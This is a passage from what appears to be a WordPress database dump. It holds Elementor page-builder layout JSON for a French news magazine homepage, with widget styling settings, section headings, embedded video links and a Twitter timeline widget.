\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1492,506,'_elementor_version','0.4'),(1493,506,'_elementor_css','a:3:{s:4:\"time\";i:1508926384;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1495,507,'_elementor_edit_mode','builder'),(1496,507,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date